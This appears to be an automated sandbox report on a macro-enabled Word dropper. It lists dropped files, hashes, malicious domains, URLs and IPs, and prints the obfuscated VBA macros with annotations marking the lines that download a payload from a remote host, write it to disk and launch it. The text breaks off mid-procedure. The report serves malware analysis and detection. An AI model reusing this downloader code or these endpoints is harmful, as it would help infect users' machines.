Entropy (8bit):6.7930378581918065
Encrypted:false
MD5:E1023D92D82A739D36EF0829181F6400
SHA1:63D822824784E415075D3B82E83E9D975C45B398
SHA-256:847E7B3DB2C1854DE2583FE92E92CCDF41EAB1B9EB3B206E2C613CD5A51253F9
SHA-512:30997818308C79FC354FC71B8A4FDC69619FBE0C17AD2579D02B1B1C308C0F4A912E919739B29CE120B6E07C2A779FDBC008E57D6E0AE806FFAE5F0796E99890
Malicious:false
Reputation:low
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3F3A4E48.jpeg
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:JPEG image data, JFIF standard 1.01, comment: "Compressed by jpeg-recompress"
Size (bytes):25424
Entropy (8bit):7.609333219786242
Encrypted:false
MD5:EC5B4D92C61DC2A7038F47526DAA0193
SHA1:4E0CA3B4D96D4DCC403074249E1A08C154448BAA
SHA-256:690EC28A885226FE4B34BA27B8AC192FC70396B3F021F66EBD9F6353FD01633B
SHA-512:93AC9753D07DBF90892BA5A9BAEE2EEB8AA15D651F97D114EAC25713A0B2C3D9DE29ADF6CCACD27A0F451C9AEB561334621A3CC3DAB04F601ACE6D9E8B548785
Malicious:false
Reputation:low
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{5A232E75-C856-4E53-862B-238266D16244}.tmp
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Size (bytes):1536
Entropy (8bit):0.11299086186625841
Encrypted:false
MD5:8B347FDA3FEE51BA1C633228915143FE
SHA1:F806A13E35A41E50A91347F126A3B1EACEF249CF
SHA-256:0B0F78FF079D19EABE0C0761D46EE9AC82D53FDB09E26EC547A80AE081B4D98C
SHA-512:0AB13C1E4FE1C230CFD099A1DE3387459CD2AEB0F64D55CBA4F8D5E80F6025F5DF085BE188773E450929948ED1EF53F7C1F4BAF491F2CA9B0C766A238A7AF29D
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe
Process:C:\Users\user\text.doc.16147.scr
File Type:data
Size (bytes):787953
Entropy (8bit):6.32567986145091
Encrypted:false
MD5:421C21B09E3C705F66A36364C20290DE
SHA1:675D949DDF963F3128616C154A8B8D4B96F385D5
SHA-256:9CC6EF91CFDDBE6D60A6AD78D661BCF3647D0093E06BA37B6EE6A49CFFD93610
SHA-512:D19D1A39827574C8C8754486FC27219EAD5A4BB73ABCA3AAD21A2D25E51EC0B0CA503D05E9DB7010D8177B772FB386EA549E720DB6EE158E833BB0DD85DFE541
Malicious:true
Reputation:low
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Templates.LNK
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:MS Windows shortcut
Size (bytes):1134
Entropy (8bit):4.591801330941196
Encrypted:false
MD5:3F67EA96D5DD461AEE0F99236BD6038A
SHA1:ED3F56BD84EB40592431096112EC5733E8FCE7B1
SHA-256:97A71E2BBFA4AF165188DB498B90E7B9E1D47B6C7D4EAE4D03ECDAB9CE16BE50
SHA-512:D4E0513478B2ADD0889C846E8CA1FD0F50FDD88CA18EFA3D18285282C3BDD54F03A159A3E1AD0D8164D4C39642B2802317B7C881C44D0F86A8380299403417DD
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\e41ZuYVo64.LNK
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:MS Windows shortcut
Size (bytes):2076
Entropy (8bit):4.56991417033767
Encrypted:false
MD5:E798401EEB606E114B0D45A264A21BF4
SHA1:17C3A20317EDC9BDE3FB95134BEB9DAE3BAA67EE
SHA-256:8293282B81FD6C1AF23060C15C0FF365E77B80DCB21F7E67BEE1D87D672821FE
SHA-512:A83AFF5799849EC58C501006CD68D59301A25E8FA5B1487D0266774CECD6D195365A2E6DA168E4B711286EE192735E01FDFC4CB322D216B2FC788C0BDB8DD200
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:ASCII text, with CRLF line terminators
Size (bytes):72
Entropy (8bit):4.768980259211503
Encrypted:false
MD5:2FC9250FBD18EA48397AB440A83B75EF
SHA1:85F2F9A40AA95346161B1E9F6F3FF82DB941D3F6
SHA-256:C097727BD20AA3DC68FF382DC36553F42AE4038C805B89BBD84C684CCC05290C
SHA-512:EC24A4456DC6F27F2DBD1584E22EF5E9CCCA726FE0827BBE60E1050B683E4561331552D0E906DDEA9CA9E60FC0D3E7D39D59389382071A5A1072157089D8E946
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Size (bytes):162
Entropy (8bit):2.145405781367122
Encrypted:false
MD5:AEB57E63BC42157218D902EC26C28600
SHA1:A49FC60365C2569DAF47605E133FF657FCCFFB99
SHA-256:AB193C7CF754ABFC5AAA5AD5C6726F8D9F5DE54D8D973AE393591495DACBC5EE
SHA-512:78AEE60975610E6FBE96EDF815E273E30BBCDA7A089E573029CABB3B1B743145226CD1B0C48BD469B80E495B6B27F36740EC6E28962C66FC95EC4B8006EFA2AF
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\Microsoft\Templates\~WRD0000.tmp
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Size (bytes):20372
Entropy (8bit):7.467938030822673
Encrypted:false
MD5:E7DDC122634905202DF543B817FA1C0C
SHA1:93965A013DDF78E8CB823B56B7A92E77520029B1
SHA-256:DB4EFA4C0D6A5B881D14C0E0CC0B160DAEBE9EBD8F6FCDFE2D933AC52F30C3C2
SHA-512:D4BECB9C784F73EFC7FB47ADD23C9B1A0755D5D3C2E97B815D50854BF2B06B7D69464FC09CB64F46FDF8E114F08409B990BF3AF288DD4AD337DB0B74A6FD6134
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\Microsoft\{3BE59EA8-5E19-25B1-409F-72297443C66D}
Process:C:\Windows\explorer.exe
File Type:ASCII text, with CRLF line terminators
Size (bytes):41
Entropy (8bit):4.217818932588802
Encrypted:false
MD5:2CE754C9FF1EC7C63DEBAFA8B3D4D12C
SHA1:A705E2317E6EF5FCE712BA7FF9C86F0EAF1EB865
SHA-256:3655E24379E9A14705C0225AC82C0BB6AFDE5058E7F68333E613C687501B104A
SHA-512:98191D84EB0441226F9D609EC0B678DBD634340F55B1558779E05A08183E05226AA3DC583A5C9BF7814D83CCCC3245C1E616E12EDF8D8D88C35528D1A664DC48
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\Microsoft\{A29E757B-998D-241A-33F6-DD98178A614C}\01D4DF331642F01E0B
Process:C:\Windows\explorer.exe
File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
Size (bytes):216
Entropy (8bit):3.5456763674858958
Encrypted:false
MD5:BE1DE233C5A415D19DDBC3BD5E7C8B7A
SHA1:A3441AF5A6C852F159601A3E05B707237EBAEEFF
SHA-256:0F99BCC793B817E8C83230DE150BE89333928B3E06D12D8F2FA33855B8E9712B
SHA-512:9BFD8A96134DBEE3416A558E2C7A66AAD61D93601343A87D265FC4036EA5E1C0047CD3A4935D56BA3BB90F5DA20E78AF65A0A90B04620048EDDF2F831BE4EB35
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\prefs.js
Process:C:\Windows\explorer.exe
File Type:ASCII text, with CRLF line terminators
Size (bytes):48
Entropy (8bit):4.5165414066556515
Encrypted:false
MD5:4DAA07115C67BED12909C4DFEA867BAD
SHA1:24ED93A0A23D41448CB8CF1F72127EEFF07D242E
SHA-256:F067EB85E0B4B3DB1C17A209B84D049551AB016098E2F6788E400298C5A4D0CA
SHA-512:7A1910448F8FA5E33FDC26519419E66BA1365E7B2F79760836A8A48947C1CF6D769DDDA2665DCE464F9F84B4680458573889A45017C3E0E584408A6E2421EA51
Malicious:true
Reputation:low
C:\Users\user\Desktop\~$1ZuYVo64.docm
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Size (bytes):162
Entropy (8bit):2.145405781367122
Encrypted:false
MD5:AEB57E63BC42157218D902EC26C28600
SHA1:A49FC60365C2569DAF47605E133FF657FCCFFB99
SHA-256:AB193C7CF754ABFC5AAA5AD5C6726F8D9F5DE54D8D973AE393591495DACBC5EE
SHA-512:78AEE60975610E6FBE96EDF815E273E30BBCDA7A089E573029CABB3B1B743145226CD1B0C48BD469B80E495B6B27F36740EC6E28962C66FC95EC4B8006EFA2AF
Malicious:false
Reputation:low
C:\Users\user\text.doc.16147.scr
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Size (bytes):783857
Entropy (8bit):6.321783327017934
Encrypted:false
MD5:2481F6BE75307B79607D12114D2B6102
SHA1:78A0D34B6C9BC08A11405C4D2E9DCE4D8D354EC9
SHA-256:79EBD97A34D3BD2F82956ED0C1EFD0F12CF5744E27A932CB627B463DA0A2A922
SHA-512:B4779B7252B129749EA3A29D126D590360215C47830C81AA1AC92A141B87B918569566DC17DE3B679CD494ED0E6BC61CA2F9808F895A50B634FB853B3753D6E4
Malicious:true
Reputation:low
\Device\Mailslot
Process:C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe
File Type:data
Size (bytes):270337
Entropy (8bit):7.878221655827671
Encrypted:false
MD5:4E1015708C017491BB8E4B5B7190477A
SHA1:EE72F61FE8A7A203FA504CC9C6A8802ADDA81663
SHA-256:EC05F7D129CFC1611664E1362A2BE7B9AAFE8D322E4138031072068F28869F4E
SHA-512:9D7B2065F83437189F3EF83394DB66E8BFE50CB86E8CF4399CA15D11A7EFBB07F315243790D572F0E2DEAD047BEBA29881B0B1B1D9A54BCA2C15BE7214164E39
Malicious:false
Reputation:low

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
profitsproject.ru | 37.152.176.90 | true | true | | unknown
myip.opendns.com | 185.189.150.76 | true | false | | high
resolver1.opendns.com | 208.67.222.222 | true | false | | high
interruption.ru | 178.169.196.83 | true | true | | unknown
freedomhouse32.ug | unknown | unknown | true | | unknown
1.0.0.127.in-addr.arpa | unknown | unknown | true | | unknown
222.222.67.208.in-addr.arpa | unknown | unknown | true | | unknown
8.8.8.8.in-addr.arpa | unknown | unknown | true | | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://31.148.219.163/images/logo2.png | false | | unknown
http://profitsproject.ru/images/Tgxl4eQFLRJ828TTb5/PbE8UHAw2/a53P1QPrTXCRCRA71Ih_/2BBJPZYAZohZ0gbHdmM/JIeRuHUg0_2BloM9tUxzvE/TCq3W9vuEdgKl/IIJpn7iq/nCbHpa_2BOmrGlofqsHXa2m/l7EvsA_2Bv/RUcywXGJJ0g8335L4/wbisH67pflFl/VqPEdPBTaVc/TGPIvkfBJu3_2Fpm/Mu1_2B.gif | true | | unknown
http://profitsproject.ru/images/tGVH9_2Ftdk/sHH41UkampY3Rs/AruAX_2BFORV1KTdlHf40/r6WQws0nBnEhQX03/cynMOwBSQIanvYM/Q4c4COJMjT5QueN5IE/sEKnnjm3Z/aQugH8GJbl7WwfFkU5qM/QNQ84zIsh2Ycx8Z7LQq/5VdFr7kpjPC9bebuaMzXSP/qpLb_2F8n3QIM/JLv3hF1o/uYK3inluwQhgfC5rYmWjZyI/kOeewEdSz/qd.bmp | true | | unknown
http://interruption.ru/free/t32.bin | true | | unknown

          URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://https://file://USER.ID%lu.exe/upd | avicbrkr.exe, 00000010.00000002.1217084078.0039C000.00000004.sdmp | true | | low
http://interruption.ru/free/t64.bin | avicbrkr.exe, 00000010.00000002.1219274895.019B8000.00000004.sdmp | false | | unknown
http://www.%s.comPA | explorer.exe, 00000005.00000000.1108931725.01CE0000.00000008.sdmp | false | | low
http://constitution.org/usdeclar.txt | avicbrkr.exe, 00000010.00000002.1217084078.0039C000.00000004.sdmp | false | | unknown
http://constitution.org/usdeclar.txtC: | avicbrkr.exe, 00000010.00000002.1217084078.0039C000.00000004.sdmp | false | | unknown

Contacted IPs


Public

IP | Country | ASN | ASN Name | Malicious
37.152.176.90 | Iran (ISLAMIC Republic Of) | 198569 | unknown | true
178.169.196.83 | Romania | 43205 | unknown | true
31.148.219.163 | Czech Republic | 14576 | unknown | false
46.139.176.151 | Hungary | 5483 | HTC-ASMagyarTelekomNyrtHU | true

Private

IP
127.0.0.1

Static File Info

General

File type:Zip archive data, at least v2.0 to extract
Entropy (8bit):7.8710962138881895
TrID:
• Word Microsoft Office Open XML Format document with Macro (52004/1) 53.61%
• Word Microsoft Office Open XML Format document (41004/1) 42.27%
• ZIP compressed archive (4004/1) 4.13%
File name:e41ZuYVo64.docm
File size:104980
MD5:86c669750b5293dd57c4d24de9722418
SHA1:12e62f9008003f5eabd8c5dfbf27f9cb89eed2b9
SHA256:96f0b343edfd0dd74a179f5744b8b999dcf5bbb821ea00e49f774320cc02eb79
SHA512:200a0146c7c8fb29d0c112a08f4c69308e4fb5e203b32c4d44be5f7da5a128a6403b0391385997fe3ab633e72f468fe6dbe57ae24556102a517ab1e5521935e8
SSDEEP:3072:0tMtFaqDe19ReqUQtEVGyMUXOA5Hr3N8H1m/3t:KMaqS9Reqx7U+UjNe103t
File Content Preview:PK..........!.........O.......[Content_Types].xml ...(.........................................................................................................................................................................................................

File Icon

Icon Hash:e4e6a2a2acbcbcac

Static OLE Info

General

Document Type:OpenXML
Number of OLE Files:1

OLE File "word/vbaProject.bin"

Indicators

Has Summary Info:False
Application Name:unknown
Encrypted Document:False
Contains Word Document Stream:False
Contains Workbook/Book Stream:False
Contains PowerPoint Document Stream:False
Contains Visio Document Stream:False
Contains ObjectPool Stream:False
Flash Objects Count:0
Contains VBA Macros:True

Streams with VBA

VBA File Name: J04Xt.bas, Stream Size: 9625
General
Stream Path:VBA/J04Xt
VBA File Name:J04Xt.bas
Stream Size:9625

VBA Code Keywords

Keyword
UrERz
String)
RAYYk
YcIPR
"Fgnvk"
String
NIuZE
JqQxS
Attribute
DrBDn
GjaAA
VB_Name
RdOLo
ASlRX
"AsukH"
VBA Code
Attribute VB_Name = "J04Xt"

Sub x(H3450 As String)
    ' Nearly every statement in this routine is obfuscation padding: junk
    ' declarations, arithmetic and string literals with no effect on behaviour.
    ' The few statements that do something are marked "Live" below.
    Dim Wcw23 As Long
    Wcw23 = (902 + 159) / 43
    Dim Vplft(6 To 253) As Long
    Vplft(6) = (-110 + 845) + 33
    Dim E5j8d As Long
    E5j8d = (-602 - 950) - 18
    Dim KKDAG(84) As Byte
    KKDAG(84) = 140
    Dim JPF2q As String
    JPF2q = "P3Wdq"
    Dim UrUg6 As String
    UrUg6 = "Q13rR"
    Dim Qg0lj(3 To 311) As Long
    Qg0lj(3) = (-528 + 259) + 4
    Dim Vy87F(7 To 248) As String
    Vy87F(7) = Ik728
    Dim X02ob As Byte
    X02ob = 111
    Dim Lgqf0(84) As Byte
    Lgqf0(84) = 138
    Dim Ej4Ik(44) As Byte
    Ej4Ik(44) = 186
    Dim Ltz67 As String
    Ltz67 = "Qjod7"
    Dim N36ch As Long
    N36ch = (-487 + 918) + 46
    Dim F1YcV As Byte
    F1YcV = 234
    Dim J5Unu(21) As Byte
    J5Unu(21) = 116
    Dim Z1Q05 As Long
    Z1Q05 = (-385 / 711) - 36
    Dim No560 As Byte
    No560 = 104
    Dim Gardq(14 To 44) As String
    Gardq(14) = A014z
    Dim Mj865 As Long
    Mj865 = (565 / 173) + 19
    Dim E38D5(13 To 76) As Long
    E38D5(13) = (803 + 826) + 29
    Dim H25p8(14 To 339) As String
    H25p8(14) = "Z65y7"
    Dim Yx77T(14 To 478) As String
    Yx77T(14) = "Ph5Xn"
    Dim YRnH6(24 To 499) As String
    YRnH6(24) = UrERz
    Dim BO5Ll(25 To 250) As Long
    BO5Ll(25) = (-317 + 385) + 42
    Dim DkZQe(83) As Byte
    DkZQe(83) = 193
    Dim In0TS(56) As Byte
    In0TS(56) = 113
    Dim W4sB8(9 To 436) As Long
    W4sB8(9) = (-573 / 409) - 20
    U5P6J = 3
    Dim Np0lB As Byte
    Dim SM03Q(96) As Byte
    SM03Q(96) = 48
    ' Live: BjOEsxO3 (defined in a stream not included in this excerpt) decodes the
    ' download URL. Shifting every character of the literal back by 3 yields
    ' http://31.148.219.163/images/logo2.png, the first entry under Contacted URLs.
    OG3wL = BjOEsxO3("kwws=2264147;154<14962lpdjhv2orjr51sqj", 3)
    Dim W08oB(4 To 498) As String
    W08oB(4) = YcIPR
    Dim A17Ss(3 To 131) As String
    A17Ss(3) = MRbO5
    ' Live: I8BD2 (module JtuJu) issues the HTTP GET and returns the response body.
    JqQxS = I8BD2(CStr(OG3wL), H3450)
    Dim HWXvn(1) As Byte
    HWXvn(1) = 193
    Dim XpDX4(12 To 164) As String
    XpDX4(12) = "PGNG2"
    Dim S56Ei(2 To 137) As String
    S56Ei(2) = NIuZE
    Dim XH8ys As String
    XH8ys = "Um550"
    Dim D3771 As String
    D3771 = EP2DB
    ' Live: instantiates the LKfy2 user form; its procedures test1 and sh1 hold
    ' the file-handling logic (only the form's attributes are recovered below).
    Set H8sz2 = New LKfy2
    Dim Phi5G(10 To 487) As Long
    Phi5G(10) = (604 / 938) + 35
    Dim DCU0D As String
    DCU0D = "P8VN5"
    Dim Pzq8I As String
    Pzq8I = ZvDa2
    Dim ASlRX As String
    ASlRX = "HEV04"
    Dim R4HT8 As String
    R4HT8 = "Fgnvk"
    Dim H05yl(23 To 116) As String
    H05yl(23) = "EMy1m"
    ' Live: hands the downloaded bytes and the path argument to test1. The LKfy2
    ' keyword list (CreateObject("adodb.stream"), .Type, .Open, .Write, Binary)
    ' indicates a binary file write.
    Call H8sz2.test1(JqQxS, H3450)
    Dim RdOLo As Byte
    Dim GZbj1(10 To 246) As Long
    GZbj1(10) = (-373 - 474) + 14
    Dim DrBDn As String
    DrBDn = "J6DD5"
    Dim FvrWP(28 To 88) As Long
    FvrWP(28) = (823 / 524) / 27
    Dim G6sS1(92) As Byte
    G6sS1(92) = 19
    Dim QN2gr As Long
    QN2gr = (784 - 717) / 14
    Dim E6t54(76) As Byte
    E6t54(76) = 232
    Dim RAYYk As String
    RAYYk = "AsukH"
    Dim MPbFq(66) As Byte
    MPbFq(66) = 80
    ' Live: sh1 receives the same path; the Shell keyword in LKfy2 suggests this
    ' is where the written file is launched.
    Call H8sz2.sh1(H3450)
    Dim UqrUz(16 To 316) As Long
    UqrUz(16) = (305 - 894) + 49
    Dim G153l(6 To 118) As String
    G153l(6) = G0d64
    Dim JdUVu(29) As Byte
    JdUVu(29) = 29
    Dim G61y7 As Byte
    G61y7 = 79
    Dim E1886(18 To 265) As Long
    E1886(18) = (-376 - 619) - 2
    Dim Y8OAf(28) As Byte
    Y8OAf(28) = 166
    Dim R1Sfd As Long
    R1Sfd = (-690 - 587) + 12
    Dim L1SPN(58) As Byte
    L1SPN(58) = 35
    Dim CN0Hv(24 To 25) As Long
    CN0Hv(24) = (588 - 519) - 12
    Dim Bn7IT(12 To 248) As String
    Bn7IT(12) = "MqXa4"
    Dim Z616Y(58) As Byte
    Z616Y(58) = 27
    Dim BUaTF(6 To 252) As String
    BUaTF(6) = W362Y
    Dim D3r3M As Long
    D3r3M = (-750 / 201) - 33
    Dim RiA0L As Byte
    RiA0L = 23
    Dim R56lI As String
    R56lI = "CA6bX"
    Dim Snt77 As Byte
    Dim IwL03(8 To 123) As String
    IwL03(8) = GjaAA
    Dim Zu23C As Long
    Zu23C = (-184 - 544) + 44
End Sub

VBA File Name: JtuJu.bas, Stream Size: 14311
General
Stream Path:VBA/JtuJu
VBA File Name:JtuJu.bas
Stream Size:14311

VBA Code Keywords

Keyword
ZyRzJ
False
"KkZbP"
QGdom
JjohY
"JtuJu"
FfRhl
RRyRA
"MTXLz"
String,
String)
FuUpS
"DHrmI"
EMnFI
"GET",
"QdrWc"
ACblY
VB_Name
"GmIPI"
Public
"Eywfs"
VPlmH
ApYPS
ECehc
MPPFQ
IdLrH
WSeKK
YERsH
JYMxd
Ntfxk
String
LSprl
Attribute
JRCMV
Function
ChFnV
BSofa
VBA Code
Attribute VB_Name = "JtuJu"

Public Function I8BD2(HT73f As String, LuU0P As String)
    ' Downloader. Apart from the MSXML2.XMLHTTP60 statements marked "Live" below,
    ' every line is obfuscation padding. The second parameter LuU0P is never used.
    Dim U5grB As Byte
    Dim BZ5kz(47) As Byte
    BZ5kz(47) = 223
    Dim I18Kb As String
    I18Kb = "DD4qR"
    Dim Cy6v7 As String
    Cy6v7 = VKsr5
    Dim FI3dl As Long
    FI3dl = (516 - 230) - 18
    Dim Hky13 As Byte
    Dim IdLrH As Long
    IdLrH = (-25 / 456) + 31
    Dim Qngb3(16) As Byte
    Qngb3(16) = 145
    Dim JB0z2 As Byte
    Dim LS5OD As Byte
    Dim Pf784 As String
    Pf784 = VFDa2
    Dim Gh0Hi(7 To 13) As String
    Gh0Hi(7) = QGdom
    Dim MieO2 As Byte
    Dim JYMxd As Byte
    JYMxd = 201
    Dim OF46X As Byte
    OF46X = 23
    Dim D6G21(17 To 442) As String
    D6G21(17) = TO8KM
    Dim WtOn1 As Long
    WtOn1 = (527 + 736) + 1
    Dim FF6H5(31) As Byte
    FF6H5(31) = 11
    Dim Bu6X2(92) As Byte
    Bu6X2(92) = 242
    Dim SU7bX As Byte
    SU7bX = 14
    Dim XK2JW As Byte
    XK2JW = 171
    Dim HI6ZS As Byte
    Dim SNu2g As Long
    SNu2g = (499 - 716) / 14
    Dim YLL53(16) As Byte
    YLL53(16) = 64
    Dim FFiqz(24) As Byte
    FFiqz(24) = 167
    Dim QWbb8 As Long
    QWbb8 = (-631 - 525) + 28
    Dim LSprl As Byte
    Dim VTNzR(35) As Byte
    VTNzR(35) = 171
    ' Live: creates the HTTP client object (late-bound, NjL7i is never declared).
    Set NjL7i = New MSXML2.XMLHTTP60
    Dim JjohY As Long
    JjohY = (-208 / 955) / 19
    Dim Ii2q5(29) As Byte
    Ii2q5(29) = 168
    Dim J02ms(33 To 183) As String
    J02ms(33) = H87Y8
    Dim JRCMV As Byte
    Dim LJRn2 As String
    LJRn2 = XPcZ8
    Dim Y7r6A As Long
    Y7r6A = (120 - 526) / 32
    Dim A8y3O As String
    A8y3O = Wt628
    Dim VPlmH As Long
    VPlmH = (-836 - 272) - 46
    Dim N4Yxi As String
    N4Yxi = "QdrWc"
    Dim BD3cq As Byte
    Dim PIs8w As Long
    PIs8w = (-500 / 156) / 38
    Dim N7HlY As Long
    N7HlY = (749 + 930) + 20
    Dim Zn5aV(23 To 108) As Long
    Zn5aV(23) = (-173 + 224) - 36
    ' Live: synchronous GET of the URL passed in HT73f.
    NjL7i.Open "GET", HT73f, False
    Dim Nc6qJ As String
    Nc6qJ = "Rt6r5"
    Dim D3Ic2 As String
    D3Ic2 = Lyu7w
    Dim UZ3ZO As Byte
    Dim HFxF6(40) As Byte
    HFxF6(40) = 48
    Dim K81yo(14 To 498) As String
    K81yo(14) = YT4R3
    Dim SjZ35(71) As Byte
    SjZ35(71) = 239
    Dim BSofa As Byte
    Dim C3G0E As Byte
    Dim EiLn6 As Byte
    EiLn6 = 248
    Dim S42Zq(12 To 249) As String
    S42Zq(12) = "U06mm"
    Dim MPPFQ As Long
    MPPFQ = (425 + 422) + 21
    Dim CRaOL(7) As Byte
    CRaOL(7) = 76
    Dim YH7u0 As Byte
    YH7u0 = 174
    Dim ACblY As Long
    ACblY = (223 - 137) / 9
    Dim RJQIq(22 To 353) As Long
    RJQIq(22) = (-338 / 233) + 48
    Dim ChFnV As String
    ChFnV = ECehc
    Dim L35r0(22 To 373) As String
    L35r0(22) = "G3mne"
    Dim Byj44 As Byte
    Byj44 = 63
    Dim VNJM6(31 To 98) As String
    VNJM6(31) = CTt54
    Dim SRHtH(1 To 284) As Long
    SRHtH(1) = (-276 + 526) / 16
    Dim ZyRzJ As String
    ZyRzJ = "VGe22"
    Dim RRyRA As String
    RRyRA = "F4gH0"
    Dim J2OM5(8 To 488) As String
    J2OM5(8) = "G6Kaw"
    Dim ApYPS As String
    ApYPS = "ELc2n"
    Dim Az3p7(3 To 103) As String
    Az3p7(3) = "MND87"
    Dim EZ1ZV(66) As Byte
    EZ1ZV(66) = 76
    Dim Af13k As Long
    Af13k = (-295 + 951) - 12
    Dim R51Vs(27 To 65) As Long
    R51Vs(27) = (-308 - 382) - 34
    ' Live: sends the request.
    NjL7i.send
    Dim PNT74(45) As Byte
    PNT74(45) = 97
    Dim Q2615 As String
    Q2615 = "BMf14"
    Dim K44qS As Long
    K44qS = (342 / 470) + 13
    Dim BAhW5(52) As Byte
    BAhW5(52) = 21
    Dim Jj1W5(5 To 73) As Long
    Jj1W5(5) = (-438 / 935) - 9
    Dim Rr5Bg(16 To 423) As String
    Rr5Bg(16) = "ZhWm1"
    Dim Mxq43(99) As Byte
    Mxq43(99) = 19
    Dim L8edw As String
    L8edw = "BVsV7"
    Dim Y2Eo8 As Byte
    Y2Eo8 = 83
    Dim SQ1x7 As Long
    SQ1x7 = (-329 + 735) + 46
    Dim Chd6y(20 To 59) As Long
    Chd6y(20) = (-378 / 840) - 20
    Dim VUpu6(18 To 238) As Long
    VUpu6(18) = (581 + 854) / 3
    Dim Tl0JN As Byte
    Tl0JN = 135
    Dim PinNp(30 To 173) As String
    PinNp(30) = "UoI88"
    Dim S40aq As String
    S40aq = "Gta02"
    Dim B3fX6(20 To 441) As Long
    B3fX6(20) = (972 - 891) + 13
    Dim HWO4Q As String
    HWO4Q = "DHrmI"
    Dim Vqs00(22 To 338) As String
    Vqs00(22) = IO4H1
    Dim YA1t2 As String
    YA1t2 = "KkZbP"
    Dim P3FE7 As String
    P3FE7 = DMpT6
    Dim OG7w8(26 To 272) As String
    OG7w8(26) = V6si1
    Dim U0JxK(97) As Byte
    U0JxK(97) = 240
    Dim Un55J As Long
    Un55J = (-102 / 376) - 26
    Dim J88mQ(27 To 101) As String
    J88mQ(27) = WlH6E
    Dim KcQt7(30 To 398) As String
    KcQt7(30) = "InRz7"
    Dim ZnrB1(27 To 492) As Long
    ZnrB1(27) = (-645 / 403) / 49
    Dim O4wI8 As String
    O4wI8 = JNo8v
    Dim YERsH As String
    YERsH = D7Hyo
    Dim Xlis1(6 To 91) As Long
    Xlis1(6) = (868 + 851) + 10
    ' Live: the raw response bytes, returned to the caller as the function result.
    OyTW4 = NjL7i.responseBody
    Dim M5tx8(21 To 317) As String
    M5tx8(21) = "MTXLz"
    Dim WSeKK As String
    WSeKK = FuUpS
    Dim RZyw2(40) As Byte
    RZyw2(40) = 81
    Dim FfRhl As String
    FfRhl = G065k
    I8BD2 = OyTW4
    Dim Ntfxk As Long
    Ntfxk = (-66 - 109) + 26
    Dim EMnFI As String
    EMnFI = "Eywfs"
    Dim YcD6N(73) As Byte
    YcD6N(73) = 10
    Dim MbC11 As String
    MbC11 = "Tylh3"
    Dim C0G6z(26 To 229) As String
    C0G6z(26) = FG3dN
    Dim RgWK0(28) As Byte
    RgWK0(28) = 129
    Dim S35Y4 As Long
    S35Y4 = (-651 + 301) / 27
    Dim XY43o(8 To 228) As Long
    XY43o(8) = (-905 + 335) / 32
    Dim O1x15(22) As Byte
    O1x15(22) = 64
    Dim M3R3w As Byte
    Dim R3QFe(6) As Byte
    R3QFe(6) = 30
    Dim A78vE As Byte
    A78vE = 126
    Dim B664h As Long
    B664h = (18 + 538) / 27
    Dim QH55r As String
    QH55r = "Ih5PG"
    Dim B8i78 As Long
    B8i78 = (-843 + 422) - 18
    Dim JvV5U(46) As Byte
    JvV5U(46) = 226
    Dim RkMj1 As String
    RkMj1 = "GmIPI"
End Function

VBA File Name: LKfy2.frm, Stream Size: 32970
General
Stream Path:VBA/LKfy2
VBA File Name:LKfy2.frm
Stream Size:32970

VBA Code Keywords

Keyword
"JmTzx"
VAhvE
SgThF
False
NxyRH
"UmDpA"
NCPvi
OkaWA
MXWMF
VB_Exposed
Cdqbn
VB_GlobalNameSpace
PBnGN
HMDxF
IAJgk
VB_Customizable
PkcLo
DBJaS
EdbfP
"XuidR"
Dykvf
ZdOQk
KAJuJ
"OXkdT"
XCgdc
"Iundr"
SYbzA
VB_Creatable
JZMjI
GcRAS
VB_Name
QKBEp
PJUqj
.Write
Public
ReDim
"GzOjv"
FFBfg
"JqSOJ"
.Type
VB_Base
MmLPO
LjSQB
UsEEv
.Open
UyUCU
CoanH
VB_TemplateDerived
JrPYW
Binary
KrjXB
"BNFSv"
PueOR
String
QcItR
NEZVw
CreateObject("adodb.stream")
SbxRg
WHhbG
Attribute
VB_PredeclaredId
Close
"BqdZA"
VQDRI
QDpZG
KPnWw
JCCHw
LGvtQ
Shell
RdHtR
                    VBA Code
                    Attribute VB_Name = "LKfy2"
                    Attribute VB_Base = "0{0917F18E-9EE5-4716-82FB-F3C380FC94B1}{ECD25D7D-BA7A-4CC7-A896-BAC7A9D141C6}"
                    Attribute VB_GlobalNameSpace = False
                    Attribute VB_Creatable = False
                    Attribute VB_PredeclaredId = True
                    Attribute VB_Exposed = False
                    Attribute VB_TemplateDerived = False
                    Attribute VB_Customizable = False
                    Public Sub test1(FW5Vg, Oj62U)
                    ' FW5Vg is the byte array the caller passes in; Oj62U is the file path written at the end.
                    ' Almost every Dim/assignment in this procedure is never read again: it is filler inserted to
                    ' hide the few operative lines, which are marked "Operative" below. Right-hand names that are
